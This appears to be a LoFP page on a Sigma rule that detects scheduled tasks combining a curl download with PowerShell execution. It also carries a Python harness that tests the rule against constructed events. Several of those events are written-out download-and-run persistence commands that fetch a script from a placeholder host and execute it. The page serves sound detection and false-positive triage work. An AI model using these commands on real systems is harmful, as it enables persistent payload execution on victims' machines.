LoFP / automation scripts combining curl and powershell in controlled environments.

Techniques

Sample rules

Scheduled Task Creation with Curl and PowerShell Execution Combo

Description

Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl to download a payload and PowerShell to execute it. This lets a malicious payload run, or a C&C server be contacted persistently, without dropping a malware sample on the host.

Detection logic

condition: all of selection_*
selection_curl:
  CommandLine|contains|all:
  - 'curl '
  - http
  - -o
selection_img:
  CommandLine|contains|windash: ' /create '
  Image|endswith: \schtasks.exe
selection_powershell:
  CommandLine|contains: powershell
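As an added example (not code from the LoFP page or the Sigma project), the three selections above evaluated in Python against constructed process-creation events, including the benign automation-script case this page catalogues as a false positive; the event names, hosts and paths are assumed placeholders.

```python
# Added example, not from the LoFP page or the Sigma project: evaluates the rule's
# selections against constructed events. Sigma 'contains'/'endswith' are case-insensitive,
# so both sides are lowercased; 'windash' is reduced to the '/' and '-' switch prefixes.

def contains_windash(haystack: str, needle: str) -> bool:
    """Simplified Sigma 'windash': accept the '-' spelling of a '/' switch too."""
    hay, nd = haystack.lower(), needle.lower()
    return nd in hay or nd.replace("/", "-") in hay


def matches_rule(event: dict) -> bool:
    """condition: all of selection_* from the rule above."""
    cmd = event.get("CommandLine", "").lower()
    image = event.get("Image", "").lower()
    # selection_curl: '-o' is a weak token; it also hits '-Out...' style switches
    selection_curl = all(tok in cmd for tok in ("curl ", "http", "-o"))
    selection_img = (contains_windash(cmd, " /create ")
                     and image.endswith("\\schtasks.exe"))
    selection_powershell = "powershell" in cmd
    return selection_curl and selection_img and selection_powershell


SCHTASKS = r"C:\Windows\System32\schtasks.exe"

# Constructed events; hosts and paths are placeholders, not real indicators.
EVENTS = {
    "download-then-run task": {"Image": SCHTASKS, "CommandLine": (
        r'schtasks.exe /create /tn Updater /sc minute /tr "cmd /c curl '
        r'http://example.invalid/u.ps1 -o C:\Users\Public\u.ps1 '
        r'& powershell -File C:\Users\Public\u.ps1"')},
    "dash-style switch": {"Image": SCHTASKS, "CommandLine": (
        r'schtasks -create /tn Updater /sc minute /tr "cmd /c curl '
        r'http://example.invalid/u.ps1 -o C:\Users\Public\u.ps1 '
        r'& powershell -File C:\Users\Public\u.ps1"')},
    "benign automation script (the LoFP case)": {"Image": SCHTASKS, "CommandLine": (
        r'schtasks.exe /create /tn ReportSync /sc daily /tr "curl '
        r'https://intranet.example.invalid/report.csv -o C:\Reports\daily.csv '
        r'&& powershell -File C:\Automation\Parse-Report.ps1"')},
    "task without a download": {"Image": SCHTASKS, "CommandLine":
        r'schtasks.exe /create /tn Backup /sc daily /tr "powershell -File C:\Automation\Backup.ps1"'},
    "curl and powershell outside schtasks": {"Image": r"C:\Windows\System32\cmd.exe", "CommandLine":
        r'cmd /c curl http://example.invalid/a.txt -o a.txt & powershell -File a.ps1'},
}


def triage(events: dict = EVENTS) -> dict:
    """Map each event name to whether the rule fires; the benign LoFP case fires too."""
    return {name: matches_rule(ev) for name, ev in events.items()}


if __name__ == "__main__":
    for name, hit in triage().items():
        print(f"{'ALERT' if hit else 'quiet'}  {name}")
```

The benign ReportSync task trips all three selections exactly like the download-then-run task, which is why scheduled automation that pairs curl with PowerShell needs an allowlist by task name or script path rather than a rule change.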